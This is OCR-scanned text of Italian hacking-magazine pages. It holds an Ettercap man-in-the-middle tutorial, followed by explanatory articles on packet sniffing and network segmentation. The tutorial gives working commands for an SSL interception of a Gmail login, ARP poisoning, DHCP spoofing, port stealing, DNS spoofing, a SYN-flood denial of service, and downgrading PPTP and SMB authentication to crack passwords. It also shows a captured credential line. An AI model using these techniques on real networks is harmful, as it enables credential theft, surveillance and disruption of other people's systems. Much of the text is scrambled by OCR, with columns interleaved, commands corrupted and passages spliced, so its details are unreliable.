basta aggiungere questa riga nel /etc/ 
ssh/sshd. config del vostro server: 


pende E CONCLUSIVA 
+= RT. IDATA 
dr mr ETTERCAP-NG, 


COMPLETO REWRITE 


E È AMATO DAGLI 
SMANETTONI” E ODIATO 


DAGLI AMMINISTRATORI 


MERI Ne 


server ù ssht, quando 
il nia) 
questa 

$ 3, -2 user@host.. 


Chiedete cosi al client di utilizzare solo 
‘ssh2 e di ignorare i request ssh1, in 
caso di insuccesso verrete avvertiti con 
uni 


Protocol major versions — 
differ: 2 vs. 1 


Se invece avete proprio bisogno di 
sshf, allora in fase di connessione al 


I CERTIFICATI 
SIEPI A ZI ZI ZO LETI 
Ora che sappiamo come fare un 
IMITM su una connessione in chiaro, 
una connessione in ssh1 e una ssh2, 
‘perché non proviamo a testare l’ultimo 


DI SISTEMA... 


baluardo, ovvero i certificati? 

Grazie ai certificati siamo in grado di | 
stabilire se la chiave inviataci da un 
‘server è realmente la sua o meno, ma 
possiamo davvero esseme sicuri? 

In realtà grazie ad Ettercap, e con la. 
‘speranza che un utente non inizi a 
leggere tutti i campi del certificato, 
saremo in grado di sniffare una | 
connessione SSL, se non ci 
facciamo una prova: per prima cosa' 
pensate ad un luogo dove avete un 
account con SSL (ad esempio l 
com, ebay.it, poste.it e molti altri), io ho 
scelto gmail.com. Una volta puntato 
il browser sull’url, Firefox mi ha subito 
chiesto di accettare un certificato, 


Guardatelo bene, il certificato sembra 
proprio provenire da google ed infatti 
è stato verificato (in alto), motivo per. 
‘cui posso continuare a navigare sicuro | 
del fatto che nessuno leggerà i miei 


dati di login. Vestiamo ora i panni del 
“cattivo”, apriamo /etc/etter.conf e 


alla lan, ma che uscirà fuori sulla rete 
intemet. /192.168.1.8/ è l'host che 


modifichiamo questa riga: vogliamo controllare, //443 significa 
che vogliamo monitorare qualunque 
ec_uid =:65534 #- connessione sulla porta 443 che è 


nobody ‘is the default SSL. Colleghiamoci quindi al sito 
scelto e guardiamo il certificato: 
Sostituendola con: tte vs 


ecluid = D 
# nobody is the default 


Diciamo cosi ad Ettercap di non 
droppare i privilegi di root dopo esser 
stato avviato. Quindi scorriamo in 
basso il file e decommentiamo queste 
due righe: 


Come vedete a parte i fingerprint 
l'unica differenza è la prima riga | 
che ci dice o meno se il certificato è 
stato verificato. Informazione questa 
che dobbiamo visualizzala a mano 
chiedendo al browser difarci vedere 
il certificato (con Mozilla Firefox), ma 
in realtà sono molto! pochi gli utenti 
che perdono tempo a guardare ogni 
volta se il certificato di un sito è valido 
© meno. Vediamo cosa succede se 
effettuiamo il login: 


#:‘if you use ipchains: 

#redir_command_o 
“ipchains (-A ‘input -i Xiface — 
“p.tep «50/0 -d 0/0 Xport -j + 
REDIRECT %rport” 

#redir_command_off = 
“ipchains-D input''*i Siface — 
“p itep +5 0/0 -d 0/0 Wportrj «= 
REDIRECT Xrport” 


# if you use iptables: — 
redir_command_on = — 
“iptables -t nat -A PREROUTING- 
«i Wiface -p tcp --dport %port-j 
REDIRECT ++to-port Xrport” —. 
redir_command_off = — 
“iptables -t nat -D PREROUTINGS 
-i Yiface -p tcp --dport kpont-] 
REDIRECT --to-port Xrport” 


Hitel: 66/102.11.99:443 <> 
USERE imaki PASS: snife3ni INFO 


SenvilceLogi. n?servi. cemai l&passi 
| google. com/gnatti 


EplUntuale come do al cesìà, 
attiva il nostro login ela relativa il 
Se usate ipchains levate,i commenti 
‘ai primi due comandi, altrimenti levate 
i commenti alla terza eQuarta riga; 
cosi come ho fatto io, visto che uso 
iptables. 

Questo comando servirà (a redirigere 
il traffico comettamente'senza che il 
layer SSL'trovi qualcosa di sospetto, 
‘avviamo quindi Ettercap con questi 
parametri: 


Fino ad ora abbia utilizzato un 
solo tipo di IMITM, cioe 
l'arp-poisoning, ‘ovviamente non, di 


# ettercap -Tq -M — 
arpimemote /192.168.1.8/ //443 


Come vedete abbiamo aggiunto un 
parametro a -M cioè: “arp:remote”, 

il primo lo conoscete, il secondo 
‘significa che vogliamo fare un attacco 
IMITM sul traffico che NON è destinato 


https://Www. google. com/dccountsz 


Ettercan-NG: 


‘ad un'server; molto probabilmente il 
traffico passerà per vari altri server. 
(ogni salto è detto ‘nop’). Se noi 
fossimo in grado di “spoofare” un 
redirect (cioè inviare un pacchetto con 
IP falso) all'host vittima, potremmo 
farci inviare il suo traffico, tutto 
questo senza avvelenare l'arp. cache 
della vittima. Questo attacco è più 
delicato dell'anp poisoninig, può 
essere effettuato solo su reti cablate 
“su hub ediin'più ci fomisce un Half- 
Duplex MITM perché il gateway reale 
nòn accetta mai IGMP_REDIRECT 

da umihost che fa parte della sua lan 
(saremiò quindi in grado di modificare 
solo il'trafffico che dalla vittima va 
verso la rete e non quello che dalla 
rete raggiunge la vittima, ma essendo 
‘su un'hub potremo comunque vederlo 
tutto). Sebbene questo attacco abbia 
delle limitazioni, risulta molto più 
stealth di un arp-poisoning. Utilizzario 
è piuttosto semplice, dobbiamo 
soltanto conoscere l'IP ed'il MAC del 
gateway, potete ottenerli ‘così 


du Pilar +)-Pird k; zi 


192.168.400) DI 


“imHaf-Duplex attuabile solo su 
ipete cablata con hub è il metodo 
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connesse sulla LAN. La macchina client 
invia un dhcp-request e il dhcp-server 
risponde-con un pacchetto contenente 
l'IP @ il gateway della rete. Ettercap non 
fa altro che spoofare un falso pacchetto, 
inserendo un IP libero, e come gateway 
il nostro IP. In questo caso avremo 
bisogno di tre parametri, il primo è un 
range di IP della lan sicuramente liberi, 
questi potete trovarli con un ping, coni 
tep-ping di nmap, oppure con l'apposito 
plugin che trovate nel menu “Plugin” 

di Ettercap. La netmask e il server 

dns. Supponiamo di esserci assicurati 
(tramite i metodi descritti poco sopra) 
che tutti gli IP da 192.168.1.20a 
1192.168.1.50 sono liberi, non ci resta 
che trovare la netmask della nostra rete, 
se non la conoscete fate: x 


$ /sbin/ifconfig | grep Mask 
‘inet addr:192.168.1.8- 

Ù Bcast:192.168,1,255 — 
Mask; 255.255.255.0 
iinet'addr;127,0,0,1 — 
Mask:255.0.0.0 


E leggete la mask associata al vostro 
IP (in questo line tiri nto 
ds basterà fare: 


$ grep nameserver /etc/resolv. jp 
conf io 
nameserver 192.168.1.2 


Per avviare l'attacco dovrete: 
n] i tre parametri appena scoperti: 


= # ettercap ... M> 
dhcp:192.168.20-= 
50/255 255.255, egli. 1,2 


L'ultimo tipo di attacco a nostra 
disposizione, stavolta utile soltanto 
sureti cablate con switchm, dove 
l’arp-poisoning non funziona (perché 

gli ip sono assegnati staticamente), si 
chiama port-stealing. Come detto poco 
‘sopra, uno switch in genere opera a 
Layer2, questo significa che vengono 
letti soltanto i MAC dei vari pacchetti, 
ma quando uno switch viene acceso le 
sue tabelle sono vuote perciò non può 
“sapere una macchina a quale porta è 
connessa. Lo switch osserva dunque il 
traffico, e segna in una tabella l'indirizzo 
MAG sorgente dei pacchetti che escono 
da una porta, dopo un po' la tabella 


+ riflettere la situazione, 


Ma quesia uscite 
‘sono ‘statiche (a meno che non lo," de 


PLUGHN 
-— n] 
nen a nostra disposizione 
divutili ‘plugein ‘che svolgono 
dell ioni molto comode, 
passeremo in rassegna tutti quelli 
presenti e vedremo che è anche 
MELLO di nostri, il primo. 


siano stia esiti proposito) persia Corbendo da dara G Veder iii 


‘una macchinapuò cambiare pc 0 può 

esser spostata da una porta al’altra; 

pr e a Aabalotn] 

fo pe —Lllec sorgente diverso 
Chettrova nella tabella, 

per 


port- 
stealing gioca su questo , ruba la 
porta dello switch inviando di continuo 
dei pacchetti che hanno come MAC 
sorgente il MAC della Vittima, e come 
destinatario noi. Iri questa maniera 
lo.switch crede che la porta da cui 
‘mandiamo i dati appartenga alla vittima 


‘e quindi redirige su di noi il suo traffico, 


dopo averlo esaminato ovviamente lo 
rimanda all'host reale. Questo metodo 
è molto efficace ma ‘attenti perché 
tale pratica genera imo traffico, e 
potrebbe anche dar fastidio agli switch, 
i danni sono temporanei, ma tenete a 
mente che in qualche occasione questo 
metodo non è raccomandabile. 

Per loggare il traffico che fa un 
determinato host verso la porta 80, 
dovremo avviare Ettercap con questi 
parametri: if 


# ettercap -Tq -M- 
port:remote /192.168.1,3/ //80 


Ricordate di settare etter.conf come 
nel caso del MITM con i certificati, 
altrimenti il port-stealing non funzionerà. 
Se la vostra rete è grande, e ci sono 
molti switch in catena, allora la vittima 
potrebbe essere su uno switch diverso 
dal vostro, in questo caso la tecnica 
‘cambia soltanto per quanto riguarda il 
MAC address di destinazione, che non 
‘sarà più quello dell’attaccante ma un 
MAC casuale. 

Con questo accorgimento i pacchetti 
che inviamo verranno propagati sugli 
altri switch (perché nessuno conosce 
quella destinazione) e riusciremo quindi 
‘a rubare la porta anche su uno switch 
lontano dal nostro. 


pluo-in presenti è: 
# ettercap -P List 


Esaminiamo quelli presenti di default 
nella tarball Il primo è arp_cop, 
possiamo avviarlo cosi: 


# ettercap -TQP arp_cop // 


Diciamo a ettercap di avviarsi in 
modalità testuale, senza stampare 
usemame e password (“-Q") di caricare 
un plugin ("-P") che è arp_cop, e di 
controllare tutta la LAN (*//7). Arp_cop è 
‘un plug-in amministrativo che sonda il 
traffico alla ricerca di pacchetti sospetti, 
come quelli che tentano di fare arp- 
poisoning. 


Il secondo plug-in della lista è autoadd, 
basterà aggiungere il parametro “P. 
autoadd' a quelli usati per avviare 
Ettercap, in questo modo verrano 
monitorati tutti gli arp-request per 5 
vedere se una macchina si è appena! |. IT Il 
‘aggiunta alla rete, in caso positivo talle|| 11: ‘di 
macchina verrà aggiunta al pool dei’ ) 
nostri 

Il terzo plug-in è chk..poison, non 
cercate di avviarlo da riga di comando 
perché non avrebbe senso vedere 

se il poisoning ha avuto successo 
prima di farlo. Quindi avviate Ettercap 
come solito, iniziate il poisoning 

e poi avviate il plug-in dal relativo 
menu. Il funzionamento non è per 
nulla complesso, il modulo invia un 
ICMP-echo-request spoofato ad ogni 
vittima del nostro poisoning (ci sono 
tre macchine, A che è la vittima, G il 
‘gateway e B siamo noi, il modulo invia 
‘ad A un ICMP-echo-request con l'IP di 
G come sorgente), se l'ICMP-echo-reply 
ci arriva indietro, allora il poisoning ha 
avuto successo, altrimenti qualcosa non 
è andata per il verso giusto. 

Il quarto plugin è dns_spoof, richiede 


alcune configurazioni fatte volta per 
volta nel file /etc/ettercap/etter.dns, 
ma, grazie a questo modulo, potremo 
intercettare i request ai dns e dirottarli 
sugli IP che desideriamo, in questo 
modo possiamo costruire dei siti cloni 
di quelli che vogliamo monitorare, e 
quindi possiamo seguire l'utente e 
vedere cosa fa, non è di certo molto 
etico, ma potrebbero anche esistere 
valide motivazione per farlo. 


DOS ATTACK 

SIVVERINICIASIANI REZIENIZAZEN 
Il quinto plug-in è dos. attack e 
può tomarci utile se per qualche 
motivo dobbiamo bloccare un host 
(vedremo poi che esiste anche un 
altro plugin adatto), utilizza un SYN 
flood leggermente modificato, Per 
prima cosa viene fatto un portscan 
alla macchina, appena viene trovata 
una porta aperta vengono inviati dei 
SYN su tale porta (con un IP fasullo), 
la vittima risponderà con un SYN-ACK 
che verrà intercettato, notate bene, 
a Layer2 e quindi gli verrà inviato 
un ACK, la connessione risulterà 
quindi stabilita. Ripetendo il processo 
svariate migliaia di volte (e sapendo 
che ogni connessione aperta utilizza 
circa 16kb di memoria) la macchina 
‘verrà completamente bloccata in 
pochissimi secondi, per avviarlo: 


# ettercap -TQP/dos_attack 


Il sesto plug-in è dummy, in realtà si 
tratta di un plug-in “scheletro" per far. 
vedere come va scritto'un modulo per 
Ettercap. 


Il settimo plug-in èfind_conn, la'sua 
funzione è quella di visualizzare tutti 
gli fiost a quali una'Macchina cerca di 
connettersi, potete testarlo così: 


# ettercap -TQzP find_conn 


L'ottavo plug-in è find_ettercap, come 
‘suggerisce il nome serve per vedere 
se ettercap sta inviando pacchetti 
sulla lan, questo metodo non risulta 
‘totalmente affidabile perché si basa su 
determinati valori e flag impostati sui 
pacchetti, che però possono sempre 


parlando di'un tool opensource. 


Il nono plug-in è find ip, questo 
modulo risulta piuttosto utile quando 
abbiamo bisogno di un IP inutilizzato 
(perché la rete non utilizza un DHCP, 
‘oppure perché abbiamo bisogno di 
un IP libero per usare altri. plug-in). 
Possiamo lanciarlo in questa maniera: 


# ettercap -TQP find_ip-// 


O possiamo specificare un pool di IP 
da scannare: 


# ettercap -TQP find_ip & 
7192.,168.,1.1-25/ 


Il decimo plug-in è finger, serve a fare 
il fingerprint passivo di un host (in 


‘fine di farci conoscere il suo sistema 


Operativo. 

Dobbiamo soltanto indicare ad 

Ettercap quali host e quali porte i il 
se; i Mint: 


# lettercap -TzP finger — 

392,168 .1.1-10/22 
Fingerprinting 4 

192.168.1.1:22. 


FINGERPRINT 


‘senza entrare troppo | 
cosa sia un tunnel GRE; 
questo plugin crea un 


che'invia il traffico fatto dal router ad 
Ettercap, e quindi lo rimanda indietro. 
Per fare ciò è però necessario un 
host fasullo che deve girare su un IP 
inutilizzato della rete (ecco che toma 
utile find ip). 


GW DISCOVER 

ni 
lItredicesimo plugin è gw..discover, 
‘serve a trovare il.gateway di una rete 
{molto utile quando stiamo facendo 
penetration-testing su una Wian/ian 
‘e non abbiamo idea di dove si trovi .il 
gateway). Petfar ciò viene inviato un 
pacchetto ad un IP estemo'alla lan con 
MAC address di destinazione il MAC 
di'un host locale. Se Ettercap vede il 
relativo SYN+ACK, allora vuol dire che 
quell'host ha inviato in rete il pacchetto 
e quindi è il gateway. 


# ettercap -TP gw_discovet > 
/192,168,1.1-255/ 


quattordicesimo plugin è isolate, 


il nome serve ad 


| isolaretn host dalla rete, a differenza 


attack questo modulo non I 
macchina utilizzando tutte le 


avvelena la cache con 
Mizero ad ‘ogni IP 
‘MAG: 


il tutto avviene inviando || 
r est spoofato, se siamo 
ado di vedeme la risposta allora 


iniziato un attacco MITM, forza il tunnel a correggere la loro Cache. Questo plug-in 


negoziare in MS-CHAPvs1 invece che in 
MS-CHAPvs2 che risulta più difficile da 
crackare, 


Il diciassettesimo plug-in è pptp_clear, 
serve (dopo aver iniziato un attacco 
IMITM) a non richiedere né compressione 
né crittografia nel tunnel pptp durante la 
negoziazione. 


Il'diciottesimo plug-in è ppip_pap 
e serve a far negoziare in chiaro 
l'autenticazione su un tunnel PPTP. 


PPTP_RENEG 


Il diciannovesimo plug-in, sempre 
dedicato ai tunnel PPTP, è pptp.reneg 
che serve a forzare la rinegoziazione, 
ovviamente torna molto utile quando 
vogliamo utilizzare un altro plug-in ppip 
ma siamo attivati tardi e la negoziazione 
è già avvenuta. 


Il ventesimo plug-in è randi | flood, Ò 
inonda la lan con MAG address casuali, ‘ 


volta riempite le tabelle, si posizionano 
‘automaticamente in modalità 
ripetitore, funzionando quiridi da hub'e** 
facilitandoci di molto la vita. 


Il ventunesimo plug-in è remote, 

browser, serve a monitorare in DA 
tutti gli url che visita un host, vengono 
mostrati solo i GET sulle pagine e non i 


request fatti alle Holt 


Il ventiduesimo plug-in è reply_arp, serve 
a rispondere agli arp-request fatti da un 
host con il nostro MAC address: 


# ettercap -TQzP reply_arp // 


Il ventitreesimo plug-in è repoison_arp, 
‘serve.come supporto agli attacchi 
MITM e risulta utile se usato insieme a 
reply_arp. 

L'esempio riportato nell'help è molto 
chiaro: se stiamo poisonando la cache 
‘di un gruppo di macchine impersonafido 
l'host B, e il vero host B effettua un 
broadcast ARP request verso un terzo 
host;'allora il gruppo di macchine 
poisonate può vedere il pacchetto e 


ona 2 gruppo 
subito dopo l'ARP regi in 
f Fair 
ba oadcast. | I ng 
# ettercap.-LUM rt remote 
= <P: repoison_dtpw4, 


192.166.1.10-20/ pe n Tra 


Mg, Li 
S Farrascoe TOP — sca 


Pormonenizi pe "oral 


lg 
promisc, serve a verificare quali host 
‘trovano in modalità promiscua, e 
fa inviando due tipi di arp-request 
mmalformati, se un host risponde vuol 
dire che è probabilmente in modalità 
Da notare che possono 


promiscua. 
‘essere generati dei falsi-positivi: 
in questa maniera molti’ ‘switch, una Ma 


» # ettercap:=TQP search. — 
promise Id i 

Mlb {Bir 

Il ventiseiesimo plug-in è smb_clear, 
questo modulo va usato dopo un 
attacco MITM e serve a far viaggiare in 
chiaro le password di samba. 


Il ventisettesimo plug-in è smb_down, 
‘anch'esso va usato dopo un attacco 

MITM e serve a non far scambiare le 

password in NTLM2, grazie a questo 

accorgimento sarà possibile crackare 
gli hash con LOptherack in pochissimi 
secondi. 


ll ventottesimo, ed ultimo plug-in, è 
‘stp_mangler, serve a diventare lo switch 
con più alta priorità all'intemo di uno 
‘spanning tree, ovviamente se non ci 
‘sono più switch, o non utilizzano STP, 
questo plug-in è inutile. Se vediamo 
che non funziona e troviamo un altro 
switch con priorità più alta della nostra, 
dobbiamo abbassare il valore numerico 
del nostro MAC address (ifconfig eth0 
hw ether nuovo; mac). 


# ettercap “Tp stp.itangler 


.,, Sp avGte qualche idea per un nuovo 
-in'potete leggere il manuale di 
per Scoprire come fare. 
li 
CONCLUSIONI 
Ettercap è un tool molto potente che 


«utilizzato insieme ad altri strumenti 


consente di effettuare un hijacking 
completo delle connessioni. | suoi 
plug-in sopperiscono a molte “carenze” 
del programma e la possibilità di 
espanderlo lo rende molto versatile. 
Tuttavia strumenti come questi ci 

fanno capire quanto complesso sia il 
compito della gestione della sicurezza 
su una rete Lan, specie se di'grandi 
dimensioni. Gli attacchi MITM sono una 
realtà, e sebbene siano estremamente 
complessi da attuare su due host remoti, 
diventano (su reti locali) assolutamente 
banali grazie a tool come Ettercap. Il 
mio consiglio è di considerare le Lan 
“sempre come terreno ostile, evitate di 
‘accedere a servizi che richiedano una 
password in chiaro (come smtp, pop8, 
ftp, telnet, web). Se proprio dovete farlo. 
‘assicuratevi che non ci siano poisoner 
sulla rete, ma anche in questa maniera 
non saprete se il gateway logga il 
traffico. Utilizzate switch dove possible... 

‘e fate un ampio uso di crittografia! || i 
forte (ssh, scp, sfpt, ipsec), controll 

i fingerprint delle vostre chiavi, 
‘annotandoli, verificate i certificati 

e state sempre attenti a quello che 
inviate sulla rete. Ricordate che con i 
vostri dati un malitenzionato potrebbe 
causarvi molti problemi, perciò se non 
ritenete importante la vostra privacy, 
pensate almeno alla vostra sicurezza, 
‘specie in questi tempi dove i tool di 
phishing si scaricano per nulla e i ladri 

di identità sono più di quanti ci si possa 
immaginare. Spero che questo articolo 

vi abbia aiutato a vedere “l’hacking” 

non più come una parola astratta, ma 
come un fatto tangibile e riproducibile 
con pochissimi strumenti. Siate sempre 
‘curiosi perché è l’unico mezzo che 
‘abbiamo per far fare ai nostri strumenti... 
‘ciò per cui non sono nati. E’ la curiosità 
‘che per anni ha contraddistinto i primi 
veri hacker, non la voglia di far danni. 


SERIAL 


LO STRATO PIU BASSO 


DELL’INFRASTRUTTURA DI RETE È 


SPESSO IGNORATO DAGLI UTENTI 


CHE NON INTERAGISCONO CON 


ESSO. SENZA CONSIDERARE 


DELIBERATAMENTE QUESTO LIVELLO È 
IMPOSSIBILE COSTRUIRE UN SISTEMA 


SICURO PER LE APPLICAZIONI CHE 
AGISCONO A LIVELLI PIÙ ELEVATI. 


IO SNIFFO, 
TU SNIFEFI, 
EGLI SNIFFA 


Sniffare è un'azione passiva 
ossia vengono elaborati 

solo i dati che raggiungono 
autonomamente lo “sniffer". 
Vuol dire che i dati devono 
viaggiare autonomamente 
perché non viene fatta 

alcuna azione per andarseli a 
prendere. 

Il concetto è fondamentale 
perché generalmente le 

reti sono segmentate da 
innumerevoli apparati, come ad 
esempio gli switch, che creano 
circuiti virtuali tra i nodi, 
oppure da router che smistano 
i pacchetti soltanto sul nodo di 
competenza. 

Se volessimo analizzare il 
traffico generato da un server 
collegato direttamente ad 

uno switch layer 2 o layer 3, 
che oggigiorno è la regola, 
occorrerebbe replicare 

in mirroring la porta del 


collegamento del server su di 
una seconda porta dello switch 
dove collocare lo sniffer. 

In tal modo tutti i dati che 
transitano sui circuiti virtuali 
tra i diversi nodi gestiti 

dallo switch, che altrimenti 
sarebbero invisibili, possono 
essere rilevati. 

Per questa ragione, se 
pensiamo di utilizzare uno 
sniffer da casa, a valle di una 
linea ADSL, per scoprire chissà 
quale segreto, probabilmente 
resteremmo delusi. 

Di contro, utilizzare uno 
strumento simile al lavoro 

o all’Università potrebbe 
essere visto come un attacco 
all’integrità del sistema e se 
le policy aziendali prevedono 
il licenziamento, attenzione a 
non farvi beccare! 

Ciò non toglie che uno sniffer 
può rivelarsi uno strumento 
insostituibile per capire in che 
modo comunicano in rete le 
applicazioni che normalmente 
utilizziamo, ma andiamo con 
ordine. 


LIVELLIED 
INDIRIZZI 


Secondo il modello ISO/OSI di 
riferimento, tutte le interfacce 
che insistono sulla medesima 
rete ethernet hanno un indirizzo 
fisico al livello più basso che 
normalmente è differente 
dall'indirizzo utilizzato dal 
protocollo, che si chiama MAC 
address. Oltre a questo, tutti i 
nodi dispongono di un indirizzo 
di broadcast univoco per tutto 
il segmento di rete. Nel normale 
funzionamento della scheda di 
rete, viene elaborato solamente 
il pacchetto che contiene il 
proprio indirizzo fisico 0 quello 
di broadcast, ignorando tutti gli 
altri. 

Lo sniffer, invece, raccoglie 
tutto. Essenzialmente presenta 
all'utente una sequenza ordinata 
di pacchetti che contengono 
principalmente l’ora in cui sono 
stati ricevuti, l'indirizzo sorgente, 
l'indirizzo di destinazione ed il 
contenuto. 


HACKER JOURNAL 19 


"SOTTO ATTACCO 


SNIFFING, TRADOTTO ALLA LETTERA, SIGNIFICA “ANNUSARE, ODORARE”. ED È 

PROPRIO IL TERMINE PIÙ ADATTO PER INDICARE L'AZIONE DI RILEVARE DATI CHE 

NON SONO DESTINATI ALLA PROPRIA MACCHINA, MA SEMPLICEMENTE IN TRANSITO. 
"SNIFFANDO” GI SI LIMITA AD ELABORARE | PACCHETTI CHE RAGGIUNGONO IL PROPRIO 
NODO CHE NORMALMENTE VERREBBERO SCARTATI, SENZA ALTERARNE IL CONTENUTO. 
QUALORA QUEST'ULTIMO VENGA ALTERATO SI TRATTEREBBE DI “SPOOFING”, DEL 

QUALE PARLEREMO PROSSIMAMENTE. | PROGRAMMI PER FARE SNIFFING SONO MOLTI 

E NON ASSIAMO LO SPAZIO DI ANALIZZARLI NEL DETTAGLIO MA | MIGLIORI SONO 
REPERIBILI ALL'INDIRIZZO HTTP://SECTOOLS.ORG/SNIFFERS.HTML, CORREDATI ANCHE DI 


UN'ESAUSTIVA DESCRIZIONE DELLE FUNZIONALITÀ DI CIASCUNO. 


Avendo a disposizione una 
sequenza di questo tipo è 
possibile ricostruire il traffico 
tra i diversi nodi ma occorre 
disporre di un discreto spazio 
sul disco perché in alcune 
realtà possono transitare 
migliaia di pacchetti al secondo 
che, se consideriamo che 
ciascuno occupa almeno 

64 byte, si capisce come si 
possa rapidamente generare 
una quantità esagerata di 
informazioni. 


Normalmente proprio per 
questa ragione è meglio 
utilizzare dei filtri con i 

quali limitarsi a catturare 
esclusivamente quei pacchetti 
che realmente reputiamo degni 
di interesse. 


MA COSA 
SNIFFO? 


L'attività più difficoltosa 
nell'uso di uno sniffer è 


decidere che cosa catturare. 
Occorre avere una profonda 
conoscenza dei meccanismi dei 
diversi protocolli di rete e non 
solo del TCP/IP. 

Per prima cosa decidiamo che 
cosa catturare e stabiliamo a 
che livello della pila ISO/OSI 
vogliamo lavorare. 

AI primo livello possiamo 
raccogliere i segnali Bluetooth, 
DSL, RS-232 ed altri, mentre 
nel secondo livello possiamo 
raccogliere i segnali Ethernet, 
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PPP, Frame Relay, Token 
Ring, Wi-Fi, ATM ed altri. In 
entrambi i livelli dobbiamo 
avere a disposizione una 
sonda particolare in grado di 
interpretare tali segnali. Nel 
nostro caso consideriamo 
unicamente la rete ethernet 
perché possiamo utilizzare 
come sonda la scheda ethernet 
del nostro computer. 

Sulla rete ethernet, al terzo 
livello, esistono vari protocolli 
alternativi all’IP (Internet 
Protocol) che conosciamo cosi 
bene. Ad esempio possiamo 
citare i protocolli IPX, X.25 

e DHCP solo per indicare i 
principali. 

Non si tratta di teoria. In pratica 
una stampante con interfaccia 
di rete configurata male, 
collegata sullo switch di casa, 
potrebbe generare traffico 

IPX assolutamente inutile. Se 
collegate uno sniffer e rilevate 
traffico IPX o Appletalk senza 
avere un Macintosh, qualcosa 
non quadra. 

Salendo al quarto livello 
possiamo rilevare 

pacchetti TCP o UDP, 

usati su IP, ma anche 

SPX se è presente 

l'IPX oppure il vecchio e 
glorioso NetBIOS, ormai in 
progressivo abbandono. 

AI livello più alto, 

applicativo, rileviamo i 
protocolli DNS, NPT, SNMP, 


POP, IMAP, FTP, IRC, HTTP, 
fino ad arrivare ai protocolli più 
oscuri utilizzati da applicazioni 
di nicchia. 


ABBIAMO LE 
IDEE CHIARE? 


E' proprio al livello applicativo 
che c'è il succo di quello che 
vogliamo scoprire. Arrivati a 
questo punto, possiamo citare 
tantissima letteratura che ci 
suggerisce come fare a rilevare 
le password, i numeri di carta di 
credito oppure dati privati che 
dovrebbero restare nascosti. 

Se consideriamo ad esempio il 
Telnet, impostando i filtri su host 
server ed host client possiamo 
limitarci a catturare il traffico in 


transito sulla porta 23 del TCP. 
All’inizio della sessione tra server 
e client avremo così modo di 
catturare la sequenza di caratteri 
che contiene l'utente e password 
praticamente senza fare alcuno 
sforzo. 
In effetti, sono tutte cose 
tecnicamente molto semplici da 
realizzare attraverso l’uso di uno 
sniffer, ma non dimentichiamo 
che i dati ci devono passare 
davanti. Infatti sapere che il 
Telnet trasmette le password 
di autenticazione in chiaro un 
carattere alla volta, ci serve 
a poco se quei caratteri non 
passano davanti alla scheda 
ethernet sulla quale insiste lo 
sniffer. Non dimentichiamo, 
inoltre, che i vecchi sistemi di 
comunicazione come Telnet 
e POP3, sono in progressivo 
abbandono a favore di sistemi 
molto più avanzati come SSL, 
HTTPS, Kerberos e simili, per i 
quali il discorso delle password in 
chiaro non vale più. Nonostante 
tutto, lo sniffer è uno strumento 
impareggiabile quando si 
vuole risolvere un problema 
di comunicazione. Sapere nel 
dettaglio che cosa si dicono 
due applicazioni attraverso 
la rete può essere molto utile 
soprattutto per coloro che 
sviluppano le applicazioni 
e vogliono implementare 
meccanismi di traffico sempre 
più performanti. 
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E\VEDERE CIÒ.CHE, 


CHE/REGOLANO 


bbiamo imparato ad 
usare uno sniffer. Lo 
abbiamo installato e 
siamo in grado di rac- 
ogliere le informazioni 
che ci interessano tra quelle in 
transito sulla rete. 
Adesso, almeno per una volta, 
dismettiamo i panni dell’hacker e 
posizioniamoci sull’altra sponda, 
dove siedono i famosi esperti di 
sicurezza. 
La priorità per un esperto di sicu- 
rezza è proteggere i dati, sempre e 
comunque. Purtroppo non si può 
sempre far ricorso al tunnelling 
vpn, crittografia, chiavi esotiche di 
cifratura e quant'altro. In qualche 
caso ciò che viene trasmesso deve 
passare in chiaro e l'eventuale uso 
di uno sniffer, da parte di un non 
avente diritto, deve essere assolu- 
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CHE PUÒ SEI PER ASCOLTARE, 
IN REALTÀ, SIvORREBBE||, 
PROTEGGERE. PER CAPIRE 'COME‘EVITAREL[[\}\ _Auy 
L'ATTACCO DA PARTE DI UNO SNIFFER[DOBBIAMO!! | | 
IMPARARE A CONOSCERE | MECCANISMI |} 
IL TRAFFICO IN RETE: 


tamente evitato. 

Per capire come proteggere il 
traffico di rete da occhi indiscreti 
dobbiamo partire dall'inizio, ossia 
da come è fatta una rete. 


SEGMENTI 
DBRETE 


Un segmento di rete consiste in 
un gruppo di macchine che condi- 
vidono traffico a bassissimo livel- 
lo, che tipicamente coincide con il 
‘segmento di collisione. Una volta 
le reti erano formate da un unico 
cavo di rete coassiale che aveva 
un inizio ed una fine racchiusi tra 
due “tappi”, ma erano frequenti i 
problemi perché bastava che un 
cavo fosse “toccato” dalla signora 


"n 


|. 
| ln 


delle pulizie per interromperne il 
funzionamento. 

Successivamente le reti si sono 
evolute e grazie all'introduzione 
del multiport repeater i problemi, 
soprattutto dovuti ai collegamenti, 
sono diminuiti ma in entrambi i 
casi il funzionamento è il mede- 
simo. 

Tutte le schede di rete parlano 

ed ascoltano, trasmettendo e 
ricevendo dati sulla medesima 
frequenza dello stesso filo, anche 
se in tempi diversi, dell'ordine di 
millisecondi. Quando due schede 
di rete trasmettono contempora- 
neamente si genera una collisione 
ed entrambe ritrasmettono i propri 
dati ripetendo successivamen- 

te il medesimo segnale. Tanto è 
minore il numero di collisioni in 
percentuale rispetto al numero di 


pacchetti trasmessi, tanto 
maggiore è la performance 
della rete. 
Va da se che quando i nodi 
sono troppi avviene ciò che 
sappiamo in un luogo troppo 
affollato, ossia si crea un 
rumore di fondo che rende 
praticamente impossibile 
la conversazione tra due 
persone. Infatti, superato il 
numero di 30 schede di rete 
che insistono sul medesi- 
mo segmento di collisione, 
le performance degradano 
in maniera esponenziale al 
crescere del traffico. 
Per questo motivo, sono sta- 
ti inventati gli switch, detti 
anche bridge intelligenti, che 
anziché ripetere i segnali 
a basso livello verso tutti i 
nodi ed attendere che le col- 
lisioni regolino il traffico, si 
interpongono come un filtro 
lasciando passare solo i dati 
che interessano il nodo che si trova 
su quella determinata porta, creando 
di fatto un circuito virtuale tra chi 
trasmette e chi riceve. 
‘1 Gli switch di questo tipo gestiscono 
al proprio interno una tabella ARP e 
sanno esattamente su quale porta si 
trova quella determinata scheda. Se 
un nodo vuole aprire una sessione, 
i segnali vengono copiati solo sulla 
porta interessata, nascondendo di 
fatto il traffico agli altri nodi. 


"AMI 


IL PROTOCOLLO 
“TCP/IP 


Esiste un altro metodo per nascon- 
dere i dati. Attraverso l’uso del TCP/ 
IP un segmento di rete può coin- 
cidere con una subnet di indirizzi 
gestita da un router. Definire i confini 
di una subnet vuol dire rendere 
‘appartenenti al medesimo segmento 
un gruppo di host non solo a livel- 

lo fisico ma al livello di protocollo. 
Quando si parla di infrastruttura di 
